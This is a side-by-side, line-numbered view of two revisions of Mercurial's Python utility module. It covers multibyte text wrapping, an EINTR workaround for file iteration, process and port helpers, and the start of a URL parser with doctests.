2466 Original TextWrapper implementation uses built-in 'len()' directly,
2475 so overriding is needed to use width information of each characters.
2467 so overriding is needed to use width information of each characters.
2476
2468
2477 In addition, characters classified into 'ambiguous' width are
2469 In addition, characters classified into 'ambiguous' width are
2478 treated as wide in East Asian area, but as narrow in other.
2470 treated as wide in East Asian area, but as narrow in other.
2479
2471
2480 This requires use decision to determine width of such characters.
2472 This requires use decision to determine width of such characters.
2481 """
2473 """
2482 def _cutdown(self, ucstr, space_left):
2474 def _cutdown(self, ucstr, space_left):
2483 l = 0
2475 l = 0
2484 colwidth = encoding.ucolwidth
2476 colwidth = encoding.ucolwidth
2485 for i in xrange(len(ucstr)):
2477 for i in xrange(len(ucstr)):
2486 l += colwidth(ucstr[i])
2478 l += colwidth(ucstr[i])
2487 if space_left < l:
2479 if space_left < l:
2488 return (ucstr[:i], ucstr[i:])
2480 return (ucstr[:i], ucstr[i:])
2489 return ucstr, ''
2481 return ucstr, ''
2490
2482
2491 # overriding of base class
2483 # overriding of base class
2492 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2484 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2493 space_left = max(width - cur_len, 1)
2485 space_left = max(width - cur_len, 1)
2494
2486
2495 if self.break_long_words:
2487 if self.break_long_words:
2496 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2488 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2497 cur_line.append(cut)
2489 cur_line.append(cut)
2498 reversed_chunks[-1] = res
2490 reversed_chunks[-1] = res
2499 elif not cur_line:
2491 elif not cur_line:
2500 cur_line.append(reversed_chunks.pop())
2492 cur_line.append(reversed_chunks.pop())
2501
2493
2502 # this overriding code is imported from TextWrapper of Python 2.6
2494 # this overriding code is imported from TextWrapper of Python 2.6
2503 # to calculate columns of string by 'encoding.ucolwidth()'
2495 # to calculate columns of string by 'encoding.ucolwidth()'
2504 def _wrap_chunks(self, chunks):
2496 def _wrap_chunks(self, chunks):
2505 colwidth = encoding.ucolwidth
2497 colwidth = encoding.ucolwidth
2506
2498
2507 lines = []
2499 lines = []
2508 if self.width <= 0:
2500 if self.width <= 0:
2509 raise ValueError("invalid width %r (must be > 0)" % self.width)
2501 raise ValueError("invalid width %r (must be > 0)" % self.width)
2510
2502
2511 # Arrange in reverse order so items can be efficiently popped
2503 # Arrange in reverse order so items can be efficiently popped
2512 # from a stack of chucks.
2504 # from a stack of chucks.
2513 chunks.reverse()
2505 chunks.reverse()
2514
2506
2515 while chunks:
2507 while chunks:
2516
2508
2517 # Start the list of chunks that will make up the current line.
2509 # Start the list of chunks that will make up the current line.
2518 # cur_len is just the length of all the chunks in cur_line.
2510 # cur_len is just the length of all the chunks in cur_line.
2519 cur_line = []
2511 cur_line = []
2520 cur_len = 0
2512 cur_len = 0
2521
2513
2522 # Figure out which static string will prefix this line.
2514 # Figure out which static string will prefix this line.
2523 if lines:
2515 if lines:
2524 indent = self.subsequent_indent
2516 indent = self.subsequent_indent
2525 else:
2517 else:
2526 indent = self.initial_indent
2518 indent = self.initial_indent
2527
2519
2528 # Maximum width for this line.
2520 # Maximum width for this line.
2529 width = self.width - len(indent)
2521 width = self.width - len(indent)
2530
2522
2531 # First chunk on line is whitespace -- drop it, unless this
2523 # First chunk on line is whitespace -- drop it, unless this
2532 # is the very beginning of the text (i.e. no lines started yet).
2524 # is the very beginning of the text (i.e. no lines started yet).
2533 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2525 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2534 del chunks[-1]
2526 del chunks[-1]
2535
2527
2536 while chunks:
2528 while chunks:
2537 l = colwidth(chunks[-1])
2529 l = colwidth(chunks[-1])
2538
2530
2539 # Can at least squeeze this chunk onto the current line.
2531 # Can at least squeeze this chunk onto the current line.
2540 if cur_len + l <= width:
2532 if cur_len + l <= width:
2541 cur_line.append(chunks.pop())
2533 cur_line.append(chunks.pop())
2542 cur_len += l
2534 cur_len += l
2543
2535
2544 # Nope, this line is full.
2536 # Nope, this line is full.
2545 else:
2537 else:
2546 break
2538 break
2547
2539
2548 # The current line is full, and the next chunk is too big to
2540 # The current line is full, and the next chunk is too big to
2549 # fit on *any* line (not just this one).
2541 # fit on *any* line (not just this one).
2550 if chunks and colwidth(chunks[-1]) > width:
2542 if chunks and colwidth(chunks[-1]) > width:
2551 self._handle_long_word(chunks, cur_line, cur_len, width)
2543 self._handle_long_word(chunks, cur_line, cur_len, width)
2552
2544
2553 # If the last chunk on this line is all whitespace, drop it.
2545 # If the last chunk on this line is all whitespace, drop it.
2554 if (self.drop_whitespace and
2546 if (self.drop_whitespace and
2555 cur_line and cur_line[-1].strip() == r''):
2547 cur_line and cur_line[-1].strip() == r''):
2556 del cur_line[-1]
2548 del cur_line[-1]
2557
2549
2558 # Convert current line back to a string and store it in list
2550 # Convert current line back to a string and store it in list
2559 # of all lines (return value).
2551 # of all lines (return value).
2560 if cur_line:
2552 if cur_line:
2561 lines.append(indent + r''.join(cur_line))
2553 lines.append(indent + r''.join(cur_line))
2562
2554
2563 return lines
2555 return lines
2564
2556
2565 global MBTextWrapper
2557 global MBTextWrapper
2566 MBTextWrapper = tw
2558 MBTextWrapper = tw
2567 return tw(**kwargs)
2559 return tw(**kwargs)
2568
2560
2569 def wrap(line, width, initindent='', hangindent=''):
2561 def wrap(line, width, initindent='', hangindent=''):
2570 maxindent = max(len(hangindent), len(initindent))
2562 maxindent = max(len(hangindent), len(initindent))
2571 if width <= maxindent:
2563 if width <= maxindent:
2572 # adjust for weird terminal size
2564 # adjust for weird terminal size
2573 width = max(78, maxindent + 1)
2565 width = max(78, maxindent + 1)
2574 line = line.decode(pycompat.sysstr(encoding.encoding),
2566 line = line.decode(pycompat.sysstr(encoding.encoding),
2575 pycompat.sysstr(encoding.encodingmode))
2567 pycompat.sysstr(encoding.encodingmode))
2576 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2568 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2577 pycompat.sysstr(encoding.encodingmode))
2569 pycompat.sysstr(encoding.encodingmode))
2578 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2570 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2579 pycompat.sysstr(encoding.encodingmode))
2571 pycompat.sysstr(encoding.encodingmode))
2580 wrapper = MBTextWrapper(width=width,
2572 wrapper = MBTextWrapper(width=width,
2581 initial_indent=initindent,
2573 initial_indent=initindent,
2582 subsequent_indent=hangindent)
2574 subsequent_indent=hangindent)
2583 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2575 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2584
2576
2585 if (pyplatform.python_implementation() == 'CPython' and
2577 if (pyplatform.python_implementation() == 'CPython' and
2586 sys.version_info < (3, 0)):
2578 sys.version_info < (3, 0)):
2587 # There is an issue in CPython that some IO methods do not handle EINTR
2579 # There is an issue in CPython that some IO methods do not handle EINTR
2588 # correctly. The following table shows what CPython version (and functions)
2580 # correctly. The following table shows what CPython version (and functions)
2589 # are affected (buggy: has the EINTR bug, okay: otherwise):
2581 # are affected (buggy: has the EINTR bug, okay: otherwise):
2590 #
2582 #
2591 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2583 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2592 # --------------------------------------------------
2584 # --------------------------------------------------
2593 # fp.__iter__ | buggy | buggy | okay
2585 # fp.__iter__ | buggy | buggy | okay
2594 # fp.read* | buggy | okay [1] | okay
2586 # fp.read* | buggy | okay [1] | okay
2595 #
2587 #
2596 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2588 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2597 #
2589 #
2598 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2590 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2599 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2591 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2600 #
2592 #
2601 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2593 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2602 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2594 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2603 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2595 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2604 # fp.__iter__ but not other fp.read* methods.
2596 # fp.__iter__ but not other fp.read* methods.
2605 #
2597 #
2606 # On modern systems like Linux, the "read" syscall cannot be interrupted
2598 # On modern systems like Linux, the "read" syscall cannot be interrupted
2607 # when reading "fast" files like on-disk files. So the EINTR issue only
2599 # when reading "fast" files like on-disk files. So the EINTR issue only
2608 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2600 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2609 # files approximately as "fast" files and use the fast (unsafe) code path,
2601 # files approximately as "fast" files and use the fast (unsafe) code path,
2610 # to minimize the performance impact.
2602 # to minimize the performance impact.
2611 if sys.version_info >= (2, 7, 4):
2603 if sys.version_info >= (2, 7, 4):
2612 # fp.readline deals with EINTR correctly, use it as a workaround.
2604 # fp.readline deals with EINTR correctly, use it as a workaround.
2613 def _safeiterfile(fp):
2605 def _safeiterfile(fp):
2614 return iter(fp.readline, '')
2606 return iter(fp.readline, '')
2615 else:
2607 else:
2616 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2608 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2617 # note: this may block longer than necessary because of bufsize.
2609 # note: this may block longer than necessary because of bufsize.
2618 def _safeiterfile(fp, bufsize=4096):
2610 def _safeiterfile(fp, bufsize=4096):
2619 fd = fp.fileno()
2611 fd = fp.fileno()
2620 line = ''
2612 line = ''
2621 while True:
2613 while True:
2622 try:
2614 try:
2623 buf = os.read(fd, bufsize)
2615 buf = os.read(fd, bufsize)
2624 except OSError as ex:
2616 except OSError as ex:
2625 # os.read only raises EINTR before any data is read
2617 # os.read only raises EINTR before any data is read
2626 if ex.errno == errno.EINTR:
2618 if ex.errno == errno.EINTR:
2627 continue
2619 continue
2628 else:
2620 else:
2629 raise
2621 raise
2630 line += buf
2622 line += buf
2631 if '\n' in buf:
2623 if '\n' in buf:
2632 splitted = line.splitlines(True)
2624 splitted = line.splitlines(True)
2633 line = ''
2625 line = ''
2634 for l in splitted:
2626 for l in splitted:
2635 if l[-1] == '\n':
2627 if l[-1] == '\n':
2636 yield l
2628 yield l
2637 else:
2629 else:
2638 line = l
2630 line = l
2639 if not buf:
2631 if not buf:
2640 break
2632 break
2641 if line:
2633 if line:
2642 yield line
2634 yield line
2643
2635
2644 def iterfile(fp):
2636 def iterfile(fp):
2645 fastpath = True
2637 fastpath = True
2646 if type(fp) is file:
2638 if type(fp) is file:
2647 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2639 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2648 if fastpath:
2640 if fastpath:
2649 return fp
2641 return fp
2650 else:
2642 else:
2651 return _safeiterfile(fp)
2643 return _safeiterfile(fp)
2652 else:
2644 else:
2653 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2645 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2654 def iterfile(fp):
2646 def iterfile(fp):
2655 return fp
2647 return fp
2656
2648
2657 def iterlines(iterator):
2649 def iterlines(iterator):
2658 for chunk in iterator:
2650 for chunk in iterator:
2659 for line in chunk.splitlines():
2651 for line in chunk.splitlines():
2660 yield line
2652 yield line
2661
2653
2662 def expandpath(path):
2654 def expandpath(path):
2663 return os.path.expanduser(os.path.expandvars(path))
2655 return os.path.expanduser(os.path.expandvars(path))
2664
2656
2665 def hgcmd():
2657 def hgcmd():
2666 """Return the command used to execute current hg
2658 """Return the command used to execute current hg
2667
2659
2668 This is different from hgexecutable() because on Windows we want
2660 This is different from hgexecutable() because on Windows we want
2669 to avoid things opening new shell windows like batch files, so we
2661 to avoid things opening new shell windows like batch files, so we
2670 get either the python call or current executable.
2662 get either the python call or current executable.
2671 """
2663 """
2672 if mainfrozen():
2664 if mainfrozen():
2673 if getattr(sys, 'frozen', None) == 'macosx_app':
2665 if getattr(sys, 'frozen', None) == 'macosx_app':
2674 # Env variable set by py2app
2666 # Env variable set by py2app
2675 return [encoding.environ['EXECUTABLEPATH']]
2667 return [encoding.environ['EXECUTABLEPATH']]
2676 else:
2668 else:
2677 return [pycompat.sysexecutable]
2669 return [pycompat.sysexecutable]
2678 return gethgcmd()
2670 return gethgcmd()
2679
2671
2680 def rundetached(args, condfn):
2672 def rundetached(args, condfn):
2681 """Execute the argument list in a detached process.
2673 """Execute the argument list in a detached process.
2682
2674
2683 condfn is a callable which is called repeatedly and should return
2675 condfn is a callable which is called repeatedly and should return
2684 True once the child process is known to have started successfully.
2676 True once the child process is known to have started successfully.
2685 At this point, the child process PID is returned. If the child
2677 At this point, the child process PID is returned. If the child
2686 process fails to start or finishes before condfn() evaluates to
2678 process fails to start or finishes before condfn() evaluates to
2687 True, return -1.
2679 True, return -1.
2688 """
2680 """
2689 # Windows case is easier because the child process is either
2681 # Windows case is easier because the child process is either
2690 # successfully starting and validating the condition or exiting
2682 # successfully starting and validating the condition or exiting
2691 # on failure. We just poll on its PID. On Unix, if the child
2683 # on failure. We just poll on its PID. On Unix, if the child
2692 # process fails to start, it will be left in a zombie state until
2684 # process fails to start, it will be left in a zombie state until
2693 # the parent wait on it, which we cannot do since we expect a long
2685 # the parent wait on it, which we cannot do since we expect a long
2694 # running process on success. Instead we listen for SIGCHLD telling
2686 # running process on success. Instead we listen for SIGCHLD telling
2695 # us our child process terminated.
2687 # us our child process terminated.
2696 terminated = set()
2688 terminated = set()
2697 def handler(signum, frame):
2689 def handler(signum, frame):
2698 terminated.add(os.wait())
2690 terminated.add(os.wait())
2699 prevhandler = None
2691 prevhandler = None
2700 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2692 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2701 if SIGCHLD is not None:
2693 if SIGCHLD is not None:
2702 prevhandler = signal.signal(SIGCHLD, handler)
2694 prevhandler = signal.signal(SIGCHLD, handler)
2703 try:
2695 try:
2704 pid = spawndetached(args)
2696 pid = spawndetached(args)
2705 while not condfn():
2697 while not condfn():
2706 if ((pid in terminated or not testpid(pid))
2698 if ((pid in terminated or not testpid(pid))
2707 and not condfn()):
2699 and not condfn()):
2708 return -1
2700 return -1
2709 time.sleep(0.1)
2701 time.sleep(0.1)
2710 return pid
2702 return pid
2711 finally:
2703 finally:
2712 if prevhandler is not None:
2704 if prevhandler is not None:
2713 signal.signal(signal.SIGCHLD, prevhandler)
2705 signal.signal(signal.SIGCHLD, prevhandler)
2714
2706
2715 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2707 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2716 """Return the result of interpolating items in the mapping into string s.
2708 """Return the result of interpolating items in the mapping into string s.
2717
2709
2718 prefix is a single character string, or a two character string with
2710 prefix is a single character string, or a two character string with
2719 a backslash as the first character if the prefix needs to be escaped in
2711 a backslash as the first character if the prefix needs to be escaped in
2720 a regular expression.
2712 a regular expression.
2721
2713
2722 fn is an optional function that will be applied to the replacement text
2714 fn is an optional function that will be applied to the replacement text
2723 just before replacement.
2715 just before replacement.
2724
2716
2725 escape_prefix is an optional flag that allows using doubled prefix for
2717 escape_prefix is an optional flag that allows using doubled prefix for
2726 its escaping.
2718 its escaping.
2727 """
2719 """
2728 fn = fn or (lambda s: s)
2720 fn = fn or (lambda s: s)
2729 patterns = '|'.join(mapping.keys())
2721 patterns = '|'.join(mapping.keys())
2730 if escape_prefix:
2722 if escape_prefix:
2731 patterns += '|' + prefix
2723 patterns += '|' + prefix
2732 if len(prefix) > 1:
2724 if len(prefix) > 1:
2733 prefix_char = prefix[1:]
2725 prefix_char = prefix[1:]
2734 else:
2726 else:
2735 prefix_char = prefix
2727 prefix_char = prefix
2736 mapping[prefix_char] = prefix_char
2728 mapping[prefix_char] = prefix_char
2737 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2729 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2738 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2730 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2739
2731
2740 def getport(port):
2732 def getport(port):
2741 """Return the port for a given network service.
2733 """Return the port for a given network service.
2742
2734
2743 If port is an integer, it's returned as is. If it's a string, it's
2735 If port is an integer, it's returned as is. If it's a string, it's
2744 looked up using socket.getservbyname(). If there's no matching
2736 looked up using socket.getservbyname(). If there's no matching
2745 service, error.Abort is raised.
2737 service, error.Abort is raised.
2746 """
2738 """
2747 try:
2739 try:
2748 return int(port)
2740 return int(port)
2749 except ValueError:
2741 except ValueError:
2750 pass
2742 pass
2751
2743
2752 try:
2744 try:
2753 return socket.getservbyname(pycompat.sysstr(port))
2745 return socket.getservbyname(pycompat.sysstr(port))
2754 except socket.error:
2746 except socket.error:
2755 raise Abort(_("no port number associated with service '%s'") % port)
2747 raise Abort(_("no port number associated with service '%s'") % port)
2756
2748
2757 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2749 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2758 '0': False, 'no': False, 'false': False, 'off': False,
2750 '0': False, 'no': False, 'false': False, 'off': False,
2759 'never': False}
2751 'never': False}
2760
2752
2761 def parsebool(s):
2753 def parsebool(s):
2762 """Parse s into a boolean.
2754 """Parse s into a boolean.
2763
2755
2764 If s is not a valid boolean, returns None.
2756 If s is not a valid boolean, returns None.
2765 """
2757 """
2766 return _booleans.get(s.lower(), None)
2758 return _booleans.get(s.lower(), None)
2767
2759
2768 _hextochr = dict((a + b, chr(int(a + b, 16)))
2760 _hextochr = dict((a + b, chr(int(a + b, 16)))
2769 for a in string.hexdigits for b in string.hexdigits)
2761 for a in string.hexdigits for b in string.hexdigits)
2770
2762
2771 class url(object):
2763 class url(object):
2772 r"""Reliable URL parser.
2764 r"""Reliable URL parser.
2773
2765
2774 This parses URLs and provides attributes for the following
2766 This parses URLs and provides attributes for the following
2775 components:
2767 components:
2776
2768
2777 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2769 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2778
2770
2779 Missing components are set to None. The only exception is
2771 Missing components are set to None. The only exception is
2780 fragment, which is set to '' if present but empty.
2772 fragment, which is set to '' if present but empty.
2781
2773
2782 If parsefragment is False, fragment is included in query. If
2774 If parsefragment is False, fragment is included in query. If
2783 parsequery is False, query is included in path. If both are
2775 parsequery is False, query is included in path. If both are
2784 False, both fragment and query are included in path.
2776 False, both fragment and query are included in path.
2785
2777
2786 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2778 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2787
2779
2788 Note that for backward compatibility reasons, bundle URLs do not
2780 Note that for backward compatibility reasons, bundle URLs do not
2789 take host names. That means 'bundle://../' has a path of '../'.
2781 take host names. That means 'bundle://../' has a path of '../'.
2790
2782
2791 Examples:
2783 Examples:
2792
2784
2793 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2785 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2794 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2786 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2795 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2787 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2796 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2788 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2797 >>> url(b'file:///home/joe/repo')
2789 >>> url(b'file:///home/joe/repo')
2798 <url scheme: 'file', path: '/home/joe/repo'>
2790 <url scheme: 'file', path: '/home/joe/repo'>
2799 >>> url(b'file:///c:/temp/foo/')
2791 >>> url(b'file:///c:/temp/foo/')
2800 <url scheme: 'file', path: 'c:/temp/foo/'>
2792 <url scheme: 'file', path: 'c:/temp/foo/'>
2801 >>> url(b'bundle:foo')
2793 >>> url(b'bundle:foo')
2802 <url scheme: 'bundle', path: 'foo'>
2794 <url scheme: 'bundle', path: 'foo'>
2803 >>> url(b'bundle://../foo')
2795 >>> url(b'bundle://../foo')
2804 <url scheme: 'bundle', path: '../foo'>
2796 <url scheme: 'bundle', path: '../foo'>
2805 >>> url(br'c:\foo\bar')
2797 >>> url(br'c:\foo\bar')
2806 <url path: 'c:\\foo\\bar'>
2798 <url path: 'c:\\foo\\bar'>
2807 >>> url(br'\\blah\blah\blah')
2799 >>> url(br'\\blah\blah\blah')
2808 <url path: '\\\\blah\\blah\\blah'>
2800 <url path: '\\\\blah\\blah\\blah'>
2809 >>> url(br'\\blah\blah\blah#baz')
2801 >>> url(br'\\blah\blah\blah#baz')
2810 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2802 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2811 >>> url(br'file:///C:\users\me')
2803 >>> url(br'file:///C:\users\me')
2812 <url scheme: 'file', path: 'C:\\users\\me'>
2804 <url scheme: 'file', path: 'C:\\users\\me'>
2813
2805
2814 Authentication credentials:
2806 Authentication credentials:
2815
2807
2816 >>> url(b'ssh://joe:xyz@x/repo')
2808 >>> url(b'ssh://joe:xyz@x/repo')
2817 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2809 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2818 >>> url(b'ssh://joe@x/repo')
2810 >>> url(b'ssh://joe@x/repo')
2819 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2811 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2820
2812
2821 Query strings and fragments:
2813 Query strings and fragments:
2822
2814
2823 >>> url(b'http://host/a?b#c')
2815 >>> url(b'http://host/a?b#c')
2824 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2816 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2825 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2817 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2826 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2818 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2827
2819
2828 Empty path:
2820 Empty path:
2829
2821
2830 >>> url(b'')
2822 >>> url(b'')
2831 <url path: ''>
2823 <url path: ''>
2832 >>> url(b'#a')
2824 >>> url(b'#a')
2833 <url path: '', fragment: 'a'>
2825 <url path: '', fragment: 'a'>
2834 >>> url(b'http://host/')
2826 >>> url(b'http://host/')
2835 <url scheme: 'http', host: 'host', path: ''>
2827 <url scheme: 'http', host: 'host', path: ''>
2836 >>> url(b'http://host/#a')
2828 >>> url(b'http://host/#a')
2837 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2829 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2838
2830
2839 Only scheme:
2831 Only scheme:
2840
2832
2841 >>> url(b'http:')
2833 >>> url(b'http:')
2842 <url scheme: 'http'>
2834 <url scheme: 'http'>
2843 """
2835 """
2844
2836
2845 _safechars = "!~*'()+"
2837 _safechars = "!~*'()+"
2846 _safepchars = "/!~*'()+:\\"
2838 _safepchars = "/!~*'()+:\\"
2847 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2839 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2848
2840
2849 def __init__(self, path, parsequery=True, parsefragment=True):
2841 def __init__(self, path, parsequery=True, parsefragment=True):
2850 # We slowly chomp away at path until we have only the path left
2842 # We slowly chomp away at path until we have only the path left
2851 self.scheme = self.user = self.passwd = self.host = None
2843 self.scheme = self.user = self.passwd = self.host = None
2852 self.port = self.path = self.query = self.fragment = None
2844 self.port = self.path = self.query = self.fragment = None
2853 self._localpath = True
2845 self._localpath = True
2854 self._hostport = ''
2846 self._hostport = ''
2855 self._origpath = path
2847 self._origpath = path
2856
2848
2857 if parsefragment and '#' in path:
2849 if parsefragment and '#' in path:
2858 path, self.fragment = path.split('#', 1)
2850 path, self.fragment = path.split('#', 1)
2859
2851
2860 # special case for Windows drive letters and UNC paths
2852 # special case for Windows drive letters and UNC paths
2861 if hasdriveletter(path) or path.startswith('\\\\'):
2853 if hasdriveletter(path) or path.startswith('\\\\'):
2862 self.path = path
2854 self.path = path
2863 return
2855 return
2864
2856
2865 # For compatibility reasons, we can't handle bundle paths as
2857 # For compatibility reasons, we can't handle bundle paths as
2866 # normal URLS
2858 # normal URLS
2867 if path.startswith('bundle:'):
2859 if path.startswith('bundle:'):
2868 self.scheme = 'bundle'
2860 self.scheme = 'bundle'
2869 path = path[7:]
2861 path = path[7:]
2870 if path.startswith('//'):
2862 if path.startswith('//'):
2871 path = path[2:]
2863 path = path[2:]
2872 self.path = path
2864 self.path = path
2873 return
2865 return
2874
2866
2875 if self._matchscheme(path):
2867 if self._matchscheme(path):
2876 parts = path.split(':', 1)
2868 parts = path.split(':', 1)
2877 if parts[0]:
2869 if parts[0]:
2878 self.scheme, path = parts
2870 self.scheme, path = parts
2879 self._localpath = False
2871 self._localpath = False
2880
2872
2881 if not path:
2873 if not path:
2882 path = None
2874 path = None
2883 if self._localpath:
2875 if self._localpath:
2884 self.path = ''
2876 self.path = ''
2885 return
2877 return
2886 else:
2878 else:
2887 if self._localpath:
2879 if self._localpath:
2888 self.path = path
2880 self.path = path
2889 return
2881 return
2890
2882
2891 if parsequery and '?' in path:
2883 if parsequery and '?' in path:
2892 path, self.query = path.split('?', 1)
2884 path, self.query = path.split('?', 1)
2893 if not path:
2885 if not path:
2894 path = None
2886 path = None
2895 if not self.query:
2887 if not self.query:
2896 self.query = None
2888 self.query = None
2897
2889
2898 # // is required to specify a host/authority
2890 # // is required to specify a host/authority
2899 if path and path.startswith('//'):
2891 if path and path.startswith('//'):
2900 parts = path[2:].split('/', 1)
2892 parts = path[2:].split('/', 1)
2901 if len(parts) > 1:
2893 if len(parts) > 1:
2902 self.host, path = parts
2894 self.host, path = parts
2903 else:
2895 else:
2904 self.host = parts[0]
2896 self.host = parts[0]
2905 path = None
2897 path = None
2906 if not self.host:
2898 if not self.host:
2907 self.host = None
2899 self.host = None
2908 # path of file:///d is /d
2900 # path of file:///d is /d
2909 # path of file:///d:/ is d:/, not /d:/
2901 # path of file:///d:/ is d:/, not /d:/
2910 if path and not hasdriveletter(path):
2902 if path and not hasdriveletter(path):
2911 path = '/' + path
2903 path = '/' + path
2912
2904
2913 if self.host and '@' in self.host:
2905 if self.host and '@' in self.host:
2914 self.user, self.host = self.host.rsplit('@', 1)
2906 self.user, self.host = self.host.rsplit('@', 1)
2915 if ':' in self.user:
2907 if ':' in self.user:
2916 self.user, self.passwd = self.user.split(':', 1)
2908 self.user, self.passwd = self.user.split(':', 1)
2917 if not self.host:
2909 if not self.host:
2918 self.host = None
2910 self.host = None
2919
2911
2920 # Don't split on colons in IPv6 addresses without ports
2912 # Don't split on colons in IPv6 addresses without ports
2921 if (self.host and ':' in self.host and
2913 if (self.host and ':' in self.host and
2922 not (self.host.startswith('[') and self.host.endswith(']'))):
2914 not (self.host.startswith('[') and self.host.endswith(']'))):
2923 self._hostport = self.host
2915 self._hostport = self.host
2924 self.host, self.port = self.host.rsplit(':', 1)
2916 self.host, self.port = self.host.rsplit(':', 1)
2925 if not self.host:
2917 if not self.host:
2926 self.host = None
2918 self.host = None
2927
2919
2928 if (self.host and self.scheme == 'file' and
2920 if (self.host and self.scheme == 'file' and
2929 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2921 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2930 raise Abort(_('file:// URLs can only refer to localhost'))
2922 raise Abort(_('file:// URLs can only refer to localhost'))
2931
2923
2932 self.path = path
2924 self.path = path
2933
2925
2934 # leave the query string escaped
2926 # leave the query string escaped
2935 for a in ('user', 'passwd', 'host', 'port',
2927 for a in ('user', 'passwd', 'host', 'port',
2936 'path', 'fragment'):
2928 'path', 'fragment'):
2937 v = getattr(self, a)
2929 v = getattr(self, a)
2938 if v is not None:
2930 if v is not None:
2939 setattr(self, a, urlreq.unquote(v))
2931 setattr(self, a, urlreq.unquote(v))
2940
2932
2941 @encoding.strmethod
2933 @encoding.strmethod
2942 def __repr__(self):
2934 def __repr__(self):
2943 attrs = []
2935 attrs = []
2944 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2936 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2945 'query', 'fragment'):
2937 'query', 'fragment'):
2946 v = getattr(self, a)
2938 v = getattr(self, a)
2947 if v is not None:
2939 if v is not None:
2948 attrs.append('%s: %r' % (a, v))
2940 attrs.append('%s: %r' % (a, v))
2949 return '<url %s>' % ', '.join(attrs)
2941 return '<url %s>' % ', '.join(attrs)
2950
2942
2951 def __bytes__(self):
2943 def __bytes__(self):
2952 r"""Join the URL's components back into a URL string.
2944 r"""Join the URL's components back into a URL string.
2953
2945
2954 Examples:
2946 Examples:
2955
2947
2956 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2948 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2957 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2949 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
